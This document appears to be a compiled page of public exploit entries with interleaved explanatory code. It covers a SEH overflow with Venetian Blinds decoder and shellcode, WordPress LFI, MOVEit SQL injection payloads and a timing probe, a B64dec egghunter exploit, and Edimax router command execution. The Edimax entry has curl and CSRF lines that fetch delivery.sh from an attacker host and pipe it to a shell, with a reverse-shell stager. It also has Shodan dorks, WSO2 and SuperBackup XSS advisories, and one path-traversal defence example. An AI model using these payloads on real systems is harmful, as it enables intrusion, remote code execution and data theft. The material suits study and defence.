venBlinds += b'\xC6\x1F'    # mov byte [eax], 0x1F
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points to the next '\x00'
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
## 26th byte - \x00 => \x49
venBlinds += b'\xC6\x49'    # mov byte [eax], 0x49
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points to the next '\x00'
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
## 28th byte - \x00 => \x02
venBlinds += b'\xC6\x02'    # mov byte [eax], 0x02
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points to the next '\x00'
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
## 30th byte - \x00 => \xED
venBlinds += b'\xC6\xED'    # mov byte [eax], 0xED
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points to the next '\x00'
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
## 32nd byte - \x00 => \xC3
venBlinds += b'\xC6\xC3'    # mov byte [eax], 0xC3
venBlinds += b'\x72'        # add [edx], dh
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh
# Jump to the decoded decoder by returning to the address we saved on the stack
venBlinds += b'\xC3'        # ret
# [!] Now we are executing the decoder!

os_decoder = b'\x90' * ((512 // 2) - len(nSEH + SEH + getPC + ebx2eax + getDecoder + venBlinds))

#badChars = 00 0d 80 82->8e 91->9f
# Custom PopCalc shellcode that avoids the bad characters
fKernel32 = b'\x33\xF6'             # xor esi, esi
fKernel32 += b'\xF7\xE6'            # mul esi
fKernel32 += b'\x64\x03\x52\x30'    # add edx, fs:[edx+30]    # EDX = Address_of_PEB
fKernel32 += b'\x03\x42\x0C'        # add eax, [edx+C]        # EAX = Address_of_LDR
fKernel32 += b'\x03\x70\x1C'        # add esi, [eax+1C]       # ESI = 1st entry in InitOrderModuleList / ntdll.dll
fKernel32 += b'\xAD'                # lodsd                   # EAX = 2nd entry in InitOrderModuleList / kernelbase.dll
fKernel32 += b'\x50'                # push eax
fKernel32 += b'\x5E'                # pop esi
fKernel32 += b'\xAD'                # lodsd                   # EAX = 3rd entry in InitOrderModuleList / kernel32.dll
fKernel32 += b'\xFF\x70\x08'        # push dword ptr [eax+8]  # [ESP] = &kernel32

gExpotTbl = b'\x33\xC9'             # xor ecx, ecx
gExpotTbl += b'\x33\xF6'            # xor esi, esi
gExpotTbl += b'\x33\xDB'            # xor ebx, ebx
gExpotTbl += b'\xF7\xE3'            # mul ebx
gExpotTbl += b'\x58'                # pop eax                 # EAX = &kernel32
gExpotTbl += b'\x50'                # push eax                # [ESP] = &kernel32
gExpotTbl += b'\x03\x70\x3C'        # add esi, [eax+0x3C]     ; ESI = RVA NewEXEHeader
gExpotTbl += b'\x03\xF0'            # add esi, eax            ; ESI = &NewEXEHeader
gExpotTbl += b'\x03\x56\x78'        # add edx, [esi+0x78]     ; EDX = RVA ExportTable
gExpotTbl += b'\x03\xD0'            # add edx, eax            ; EDX = &ExportTable = 763477B0
gExpotTbl += b'\x03\x5A\x20'        # add ebx, [edx+0x20]     ; EBX = RVA ExportNameTable
gExpotTbl += b'\x03\xD8'            # add ebx, eax            ; EBX = &ExportNameTable
gExpotTbl += b'\x03\x4A\x24'        # add ecx, [edx+0x24]     ; ECX = RVA ExportOrdinalTable
gExpotTbl += b'\x03\xC8'            # add ecx, eax            ; ECX = &ExportOrdinalTable
gExpotTbl += b'\x51'                # push ecx
gExpotTbl += b'\x33\xFF'            # xor edi, edi
gExpotTbl += b'\x03\x7A\x1C'        # add edi, [edx+0x1C]     ; EDI = RVA ExportAddrTable
gExpotTbl += b'\x03\xF8'            # add edi, eax            ; EDI = &ExportAddrTable
gExpotTbl += b'\x57'                # push edi

fWinExec = b'\x68\x57\x69\x6E\x45'  # push 0x456E6957         ; EniW
fWinExec += b'\x33\xC0'             # xor eax, eax            ; EAX = Counter
fWinExec += b'\x33\xF6'             # xor esi, esi
fWinExec += b'\x03\xF4'             # add esi, esp            ; ESI = "WinE"
fWinExec += b'\xFC'                 # cld                     ; Process strings left to right
fWinExec += b'\x50'                 # push eax
fWinExec += b'\x33\xC9'             # xor ecx, ecx
fWinExec += b'\x41'                 # inc ecx
fWinExec += b'\x41'                 # inc ecx
fWinExec += b'\x41'                 # inc ecx
fWinExec += b'\x41'                 # inc ecx
fWinExec += b'\xF7\xE1'             # mul ecx
fWinExec += b'\x33\xFF'             # xor edi, edi
fWinExec += b'\x03\x3C\x18'         # add edi, [eax+ebx]
fWinExec += b'\x58'                 # pop eax
fWinExec += b'\x03\x7C\x24\x0C'     # add edi, [esp+0xC]      ; EDI = &NthNameString
fWinExec += b'\xF3\xA6'             # repe cmpsb              ; compare [&NthNameString] to "WinExec"
fWinExec += b'\x74\x03'             # jz found                ; If [&NthNameString] == "WinExec" end loop
fWinExec += b'\x40'                 # inc eax                 ; Counter ++
fWinExec += b'\xEB\xE1'             # jmp short searchLoop    ; restart loop
fWinExec += b'\x33\xC9'             # xor ecx, ecx
fWinExec += b'\x41'                 # inc ecx
fWinExec += b'\x41'                 # inc ecx
fWinExec += b'\xF7\xE1'             # mul ecx
fWinExec += b'\x33\xC9'             # xor ecx, ecx
fWinExec += b'\x03\x4C\x24\x08'     # add ecx, [esp+0x8]      ; ECX = &ExportOrdinalTable
fWinExec += b'\x03\xC8'             # add ecx, eax
fWinExec += b'\x33\xC0'             # xor eax, eax
fWinExec += b'\x66\x03\x01'         # add ax, [ecx]           ; AX = ordinalNumber
fWinExec += b'\x33\xC9'             # xor ecx, ecx
fWinExec += b'\x41\x41\x41\x41'     # inc ecx X 4
fWinExec += b'\xF7\xE1'             # mul ecx
fWinExec += b'\xFF\x74\x24\x04'     # push dword [esp+0x4]
fWinExec += b'\x01\x04\x24'         # add [esp], eax
fWinExec += b'\x5A'                 # pop edx
fWinExec += b'\x33\xDB'             # xor ebx, ebx
fWinExec += b'\x03\x1A'             # add ebx, [edx]          ; EBX = RVA WinExec
fWinExec += b'\x03\x5C\x24\x0C'     # add ebx, [esp+0xC]      ; EBX = &WinExec

# Call WinExec( CmdLine, ShowState );
#   CmdLine   = "calc.exe"
#   ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
callWinExec = b'\x33\xC9'               # xor ecx, ecx        ; clear ecx register
callWinExec += b'\x51'                  # push ecx            ; string terminator 0x00 for "calc.exe" string
callWinExec += b'\x68\x2E\x65\x78\x65'  # push 0x6578652e     ; exe. : 6578652e
callWinExec += b'\x68\x63\x61\x6C\x63'  # push 0x636c6163     ; clac : 636c6163
callWinExec += b'\x33\xC0'              # xor eax, eax
callWinExec += b'\x03\xC4'              # add eax, esp        ; save pointer to "calc.exe" string in eax
callWinExec += b'\x41'                  # inc ecx             ; uCmdShow SW_SHOWNORMAL = 0x00000001
callWinExec += b'\x51'                  # push ecx            ; uCmdShow - push 0x1 to stack # 2nd argument
callWinExec += b'\x50'                  # push eax            ; lpCmdLine - push string address to stack # 1st argument
callWinExec += b'\xFF\xD3'              # call ebx            ; Call the WinExec Function

shellcode = fKernel32 + gExpotTbl + fWinExec + callWinExec

buffer = os_nSEH + nSEH + SEH + getPC + ebx2eax + getDecoder + venBlinds + os_decoder + firstHalf + shellcode
filler = b'\x77' * (9000 - len(buffer))
buffer = buffer + filler

try:
    payload = buffer
    with open(File, 'wb') as f:
        f.write(payload)
    print(File + " created successfully")
except IOError:
    print(File + ' failed to create')
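The exploit's comments describe three moving parts that are hard to check by eye: the textbox widens every ASCII byte to UTF-16 (byte, 0x00), the Venetian Blinds stubs poke the missing odd bytes of the decoder into those null slots, and the zipper decoder then compacts the widened shellcode back into contiguous machine code. The following is an added example, not part of the exploit, that models all three in Python using the DecoderHex, firstHalf and venBldHalf values from the exploit above; it regenerates the venBlinds byte sequence from the list of fill bytes so that the same construction works for any decoder, and it models the decoder loop on an arbitrary sample so the in-place compaction can be seen to round-trip. Register names in the comments refer to the exploit's register use.

```python
# Values taken from the exploit above: the decoder's machine code, the bytes it is
# stored as (firstHalf) and the bytes the venBlinds stubs write into the null slots.
DECODER_HEX = "505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3"
FIRST_HALF = bytes.fromhex("5047D2C9B904DB42DB1C20304774EB50")
SECOND_HALF = bytes.fromhex("5F3333661033423202103F1F4902EDC3")


def unicode_expand(data):
    """Model the widening the text box applies: each byte becomes byte, 0x00 (UTF-16LE of ASCII)."""
    return b"".join(bytes((b, 0)) for b in data)


def venetian_patch(expanded, fill_bytes):
    """Write fill_bytes into the 0x00 slots of a widened buffer, as the mov byte [eax], imm8 stubs do."""
    buf = bytearray(expanded)
    null_slots = range(1, len(buf), 2)
    if len(null_slots) != len(fill_bytes):
        raise ValueError("need exactly one fill byte per null slot")
    for slot, value in zip(null_slots, fill_bytes):
        if buf[slot] != 0:
            raise ValueError("slot %d is not a null" % slot)
        buf[slot] = value
    return bytes(buf)


def build_venetian_stubs(fill_bytes):
    """Reproduce the exploit's venBlinds sequence for an arbitrary list of fill bytes.

    Each stub is `mov byte [eax], imm8` (C6 xx) followed by the `add [edx], dh`
    realigning nop (72) and two `inc eax` (40) that step over the real byte to the
    next null slot; widened to UTF-16 that is 14 bytes per patched byte.
    """
    NOP, INC, MOV, RET = b"\x72", b"\x40", b"\xC6", b"\xC3"
    out = bytearray(INC + NOP)                    # step EAX onto the first null slot
    last = len(fill_bytes) - 1
    for i, value in enumerate(fill_bytes):
        out += MOV + bytes((value,)) + NOP
        if i == last:
            out += INC + NOP + RET                # return into the now-decoded decoder
        else:
            out += INC + NOP + INC + NOP
    return bytes(out)


def zipper_decode(expanded, loop_count=0x410):
    """Model the zipper decoder loop: copy every second byte down so the shellcode is contiguous.

    EAX points at the first shellcode byte, EDI at the first null after it, and EDX
    steps by two; the loop runs loop_count times (0x410 in the exploit) regardless of
    how long the shellcode really is, which is why the trailing 0x77 filler is harmless.
    """
    buf = bytearray(expanded)
    edi, edx = 1, 0
    for _ in range(loop_count):
        edx += 2
        if edx >= len(buf):
            break
        buf[edi] = buf[edx]
        edi += 1
    return bytes(buf[:edi])
```

The first two assertions in the test are the check worth running before building a payload like this by hand: the even bytes of the decoder must be exactly what you embed, and the odd bytes must be exactly what the stubs write, or the decoder that runs is not the one you disassembled.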
-
WordPress Plugin Media Library Assistant 2.81 - Local File Inclusion
# Exploit Title: WordPress Plugin Media Library Assistant 2.81 - Local File Inclusion
# Google Dork: N/A
# Date: 2020-04-13
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: http://davidlingren.com/
# Software Link: https://wordpress.org/plugins/media-library-assistant/
# Version: 2.81
# Tested on: Windows 7 x86 SP1
# CVE : CVE-2020-11731, CVE-2020-11732

---- Local File Inclusion ----------------------------
There is a file inclusion vulnerability in the mla-file-downloader.php file. Example:

http://server/wordpress/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=C:\Bitnami\wordpress-5.3.2-2\apps\wordpress\htdocs\wp-content\plugins\updraftplus\options.php

Visiting the above URL discloses the contents of options.php. Note that this vulnerability does not require authentication, and that mla_download_file accepts an absolute path, so no ../ sequences are needed; mla_download_type sets the Content-Type the file is served with.

---- Multiple Cross-Site Scripting -------------------
There are both reflected and stored cross-site scripting vulnerabilities in almost all Settings/Media Library Assistant tabs, which allow remote authenticated users to execute arbitrary JavaScript. Note that these vulnerabilities require authentication.

Tested on Windows 7 Pro SP1 32-bit and WordPress 5.3.2
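Five of the advisories on this page (Zen Load Balancer's filelog, TVT NVMS 1000's URL path, webTareas' prefix/extpath pair, WSO2 API Manager's extensionName and Media Library Assistant's mla_download_file) are the same defect: a client-supplied name is joined onto a server directory and used as-is. The following is an added example, not code from any of those projects, of the containment check each of them lacks. It is written so that every payload shown on this page is rejected for the reason it would have succeeded: repeated percent-decoding catches webTareas' `..%2F`, the backslash rewrite catches Windows-style `..\`, the absolute-path check catches Media Library Assistant's `C:\...\options.php`, the component check catches plain `../` chains, and a final realpath comparison catches anything a symlink under the base directory would let through. The base directory is a hypothetical path for the demonstration.

```python
import os
from urllib.parse import unquote

# Hypothetical base directory for the demonstration (the real applications anchor
# their reads in a log directory, the web root or the registry extensions directory).
BASE_DIR = os.path.realpath("/srv/app/logs")


def safe_resolve(base_dir, user_supplied, max_decode_rounds=2):
    """Return the absolute path under base_dir named by user_supplied, or raise ValueError."""
    candidate = user_supplied
    # Decode percent-encoding until it stops changing (bounded): '..%2F' needs one
    # round to become '../', double-encoded '..%252F' needs two.
    for _ in range(max_decode_rounds):
        decoded = unquote(candidate)
        if decoded == candidate:
            break
        candidate = decoded
    # Treat backslashes as separators too; the Windows targets above accept either.
    candidate = candidate.replace("\\", "/")
    # Absolute paths and drive letters never belong in a relative file name.
    if candidate.startswith("/") or (len(candidate) > 1 and candidate[1] == ":"):
        raise ValueError("absolute path rejected: %r" % user_supplied)
    # Reject any '..' component outright; normalising first is not enough, because
    # '../../x' normalises to itself and still escapes.
    parts = [p for p in candidate.split("/") if p not in ("", ".")]
    if not parts:
        raise ValueError("empty path rejected")
    if ".." in parts:
        raise ValueError("traversal rejected: %r" % user_supplied)
    full = os.path.realpath(os.path.join(base_dir, *parts))
    # realpath follows symlinks, so re-check containment on the resolved path.
    if os.path.commonpath([full, base_dir]) != base_dir:
        raise ValueError("escapes base directory: %r" % user_supplied)
    return full


def is_rejected(base_dir, user_supplied):
    """True when safe_resolve refuses the name."""
    try:
        safe_resolve(base_dir, user_supplied)
    except ValueError:
        return True
    return False


def resolves_to(base_dir, user_supplied, *expected_parts):
    """True when safe_resolve accepts the name and maps it to base_dir/expected_parts."""
    return safe_resolve(base_dir, user_supplied) == os.path.join(base_dir, *expected_parts)
```

Rejecting rather than normalising is deliberate: a sanitiser that strips `../` and keeps going turns `....//` into `../` again, whereas a name containing a `..` component has no legitimate use in any of the five interfaces above.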
-
MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection
# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection
# Google Dork: inurl:human.aspx intext:moveit
# Date: 2020-04-12
# Exploit Authors: Aviv Beniash, Noam Moshe
# Vendor Homepage: https://www.ipswitch.com/
# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1
# CVE : CVE-2019-16383
#
# Related Resources:
# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability
# https://nvd.nist.gov/vuln/detail/CVE-2019-16383
#
# Description:
# The API call for revoking logon tokens is vulnerable to a
# time-based blind SQL injection via the 'token' parameter.
# Which payload applies depends on the database backend the
# MOVEit Transfer instance was installed with (MSSQL or MySQL);
# a roughly 10 second delay in the response confirms the injection.

# MSSQL payload:
POST /api/v1/token/revoke HTTP/1.1
Host: moveittransferstg
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

token='; WAITFOR DELAY '0:0:10'--

# MySQL payload:
POST /api/v1/token/revoke HTTP/1.1
Host: moveittransferstg
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

token=' OR SLEEP(10);
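Time-based blind injection is only as good as the timing comparison, so here is an added example, not part of the advisory or of MOVEit, of a probe that sends the two payloads above and decides from the delay relative to a benign baseline. Because nothing here may talk to a real server, the example also includes a constructed stand-in for /api/v1/token/revoke that pauses when the token carries WAITFOR or SLEEP(), standing in for a database honouring the delay; run `demo()` to see the probe report True against the injectable stand-in and False against the fixed one. The endpoint path and parameter name are the advisory's; the host, port and delay are assumptions.

```python
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, quote
from urllib.request import Request, urlopen

DELAY = 1.0  # seconds the injectable stand-in pauses, mirroring WAITFOR DELAY / SLEEP()


class RevokeHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for /api/v1/token/revoke; it is not MOVEit code."""
    injectable = True

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode("utf-8", "replace")
        token = parse_qs(body).get("token", [""])[0]
        # An injectable backend would concatenate `token` into its statement and the
        # database would honour the delay; here the delay is simulated directly.
        if self.injectable and ("WAITFOR" in token.upper() or "SLEEP(" in token.upper()):
            time.sleep(DELAY)
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass


def start_server(injectable):
    """Bind an ephemeral localhost port and serve in a background thread."""
    handler = type("Handler", (RevokeHandler,), {"injectable": injectable})
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def timed_post(url, token):
    """POST token=<value> as the advisory does and return the elapsed seconds."""
    data = ("token=" + quote(token, safe="")).encode()
    req = Request(url, data=data, headers={"Content-Type": "application/x-www-form-urlencoded"})
    started = time.monotonic()
    with urlopen(req, timeout=30) as resp:
        resp.read()
    return time.monotonic() - started


def probe_time_based_sqli(url, delay=DELAY):
    """Send the MSSQL and MySQL delay payloads and compare against a benign baseline.

    Returns {'mssql': bool, 'mysql': bool}; True means the response took at least
    80% of `delay` longer than the baseline, the signature of a time-based blind
    injection. Measuring a baseline first keeps a slow but healthy server from
    being reported as injectable.
    """
    baseline = timed_post(url, "benign-token")
    payloads = {
        "mssql": "'; WAITFOR DELAY '0:0:%d'--" % int(delay),
        "mysql": "' OR SLEEP(%d);" % int(delay),
    }
    return {name: timed_post(url, p) - baseline >= 0.8 * delay for name, p in payloads.items()}


def demo():
    """Probe an injectable and a fixed stand-in in turn; returns both result dicts."""
    results = []
    for injectable in (True, False):
        server = start_server(injectable)
        url = "http://127.0.0.1:%d/api/v1/token/revoke" % server.server_address[1]
        try:
            results.append(probe_time_based_sqli(url))
        finally:
            server.shutdown()
            server.server_close()
    return results
```

Against a real target, repeat each measurement a few times and raise the delay before trusting a single True: network jitter of a second or two is common, and a WAITFOR on a busy MSSQL instance can also be queued.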
-
B64dec 1.1.2 - Buffer Overflow (SEH Overflow + EggHunter)
# Exploit Title: B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)
# Date: 2020-04-13
# Exploit Author: Andy Bowden
# Vendor Homepage: http://4mhz.de/b64dec.html
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Version: Base64 Decoder 1.1.2
# Tested on: Windows 10 x86

#Instructions:
# Run the script to create the Crash.txt file. Copy the contents of the file and paste them into the search box and then click decode.

f = open("crash.txt", "wb")

padding1 = b"ERCDERCD"
padding1 += b"\x90" * 100

# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
# cmd=calc.exe exitfunc=thread -f python
payload = b""
payload += b"\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
payload += b"\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
payload += b"\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
payload += b"\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
payload += b"\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
payload += b"\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
payload += b"\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
payload += b"\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
payload += b"\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
payload += b"\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
payload += b"\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
payload += b"\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
payload += b"\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
payload += b"\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
payload += b"\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
payload += b"\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
payload += b"\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

egghunter = b"\x8B\xFD"                # mov edi,ebp
egghunter += b"\xB8\x45\x52\x43\x44"   # mov eax,45525344 ERCD
egghunter += b"\x47"                   # inc edi
egghunter += b"\x39\x07"               # cmp dword ptr ds:[edi],eax
egghunter += b"\x75\xFB"               # jne
egghunter += b"\x39\x07"               # cmp dword ptr ds:[edi],eax
egghunter += b"\x75\xF7"               # jne
egghunter += b"\xFF\xE7"               # jmp edi

buf = padding1 + payload
buf += b"\x90" * (580 - len(padding1 + payload))
buf += egghunter
buf += b"\x90" * (620 - len(buf))
buf += b"\x90\x90\xEB\xCE"
buf += b"\x86\x1e\x40"  # 00401e86

f.write(buf)
f.close()
-
Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution
# Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution
# Date: 2020-04-13
# Exploit Author: Wadeek
# Hardware Version: EW-7438RPn-v3 Mini
# Firmware Version: 1.23 / 1.27
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip

== Shodan Dorks ==

(Setup Mode)
"HTTP/1.0 302 Redirect" "Server: Boa/0.94.14rc21" "http://(null)/index.asp"

(Unsetup Mode)
"HTTP/1.1 401 Unauthorized" "Server: Boa/0.94.14rc21" "Default Name:admin Password:1234"

== Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) ==

GET /wizard_reboot.asp

showSSID = "<WIRELESS-NAME>";
document.write('<font class=\"textcolor\">'+"<WIRELESS-SECURITY-KEY>"+'</font>');

== Command Execution * ==

(Setup Mode)
curl 'http://<RHOST>/goform/mp' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'

(Unsetup Mode with default password)
curl 'http://<RHOST>/goform/mp' -H 'Authorization: Basic YWRtaW46MTIzNA==' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'

== Cross-Site Request Forgery -> Command Execution * ==

<form action="http://edimaxext.setup/goform/mp" method="POST">
<input type="hidden" name="command" value="|| busybox wget -O - http://<LHOST>/delivery.sh | /bin/sh">
<input type="submit" value="">
</form>

* [ delivery.sh ]
--------------------------------------------------------------------------------------
# (msfvenom) linux/mipsbe/shell/reverse_tcp
cd /tmp/
busybox wget -O reverse http://<LHOST>/reverse
busybox chmod +x reverse
./reverse &
--------------------------------------------------------------------------------------
-
WSO2 3.1.0 - Persistent Cross-Site Scripting
# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting
# Date: 2020-04-13
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Software link: https://apim.docs.wso2.com/en/latest/
# CVE: N/A
# Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700

Technical Details & Description:
================================
A remote stored cross-site scripting vulnerability has been discovered in the WSO2 API Manager Resource Browser component.
The vulnerability allows a remote attacker with access to the "Resource Browser" component to inject malicious code through the Add Comment feature.
It is triggered by sending a POST request to `/carbon/info/comment-ajaxprocessor.jsp` with the parameters "comment=targeted&path=%2F".

Remote attackers have the ability to spread malware, hijack a session (including a session with higher privileges), or initiate phishing attacks.

The security risk of the stored XSS web vulnerability is estimated as medium, with a CVSS (Common Vulnerability Scoring System) score of 5.4.
Exploitation of the stored XSS web vulnerability requires a low-privilege web-application user account and medium or high user interaction.
Successful exploitation of the vulnerability results in compromising the server.

Request Method:
[+] POST

Module:
[+] /carbon/info/comment-ajaxprocessor.jsp

Parameters:
[+] comment=admincomment
[+] path=%2F

=======================================
POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1
Host: 192.168.149.1:9443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH
Content-Length: 64
Cookie: region3_registry_menu=visible; region3_metadata_menu=none; wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e; JSESSIONID=4B3AB3AA8895F2897685FA98C327D521; requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=registry_menu%252Cresource_browser_menu%2523
Connection: close

comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F

==============================
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
vary: accept-encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Tue, 31 Dec 2019 10:50:00 GMT
Connection: close
Server: WSO2 Carbon Server
Content-Length: 3144

//the body of the response includes the attacker's malicious script
<a class="closeButton icon-link registryWriteOperation" onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete" style="background-image: url(../admin/images/delete.gif);position:relative;float:right"> </a>
<iframe href=http://phishing_url>
<br/>
posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker

Proof of Concept (PoC):
=======================
//Let's suppose we're attacking an admin with higher privileges
1-Attacker opens his account
2-Adds an arbitrary comment
3-Intercepts the request
4-Adds the malicious script to the comment
5-Admin accesses his account and wants to add a comment; the malicious script gets executed
===>Admin account compromised

===============================================================================
Example malicious script :
<script>
alert(document.cookie);
</script>
===============================================================================
-
SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting
# Title: SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: http://dropouts.in/
# Software Link: https://apps.apple.com/us/app/super-backup-export-import/id1052684097
# CVE: N/A

Document Title:
===============
SuperBackup v2.0.5 iOS - (VCF) Persistent XSS Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2202

Release Date:
=============
2020-04-15

Vulnerability Laboratory ID (VL-ID):
====================================
2202

Common Vulnerability Scoring System:
====================================
4.6

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Backup all your iPhone or iPad contacts in 1 tap and export them. Fastest way to restore contacts from PC or Mac. Export by mailing the backed up contacts file to yourself. Export contacts file to any other app on your device. Export all contacts directly to your PC / Mac over Wifi, no software needed! Restore any contacts directly from PC / Mac. Restore contacts via mail. Get the ultimate contacts backup app now.

(Copy of the Homepage: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site web vulnerabilities in the official SuperBackup v2.0.5 ios mobile application.
Affected Product(s):
====================
Dropouts Technologies LLP
Product: Super Backup v2.0.5

Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Pre auth - no privileges

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered in the official SuperBackup v2.0.5 ios mobile application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise the mobile web-application from the application-side.

The cross site scripting web vulnerabilities are located in the `newPath`, `oldPath` & `filename` parameters of the vcf listing module.
Remote attackers are able to inject own malicious persistent script codes as vcf filename to the main index list. The request method to inject is POST and the attack vector of the vulnerability is located on the application-side. The injection point is located at the vcf filename or import. The execution point occurs in the main index list after the import or insert.

Remote attackers are able to inject own script codes to the client-side requested vulnerable web-application parameters. The attack vector of the vulnerability is persistent and the request method to inject/execute is POST. The vulnerabilities are classic client-side cross site scripting vulnerabilities. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST

Vulnerable Module(s):
[+] VCF

Vulnerable Parameter(s):
[+] newPath (path - vcf filename)
[+] oldPath (path - vcf filename)

Proof of Concept (PoC):
=======================
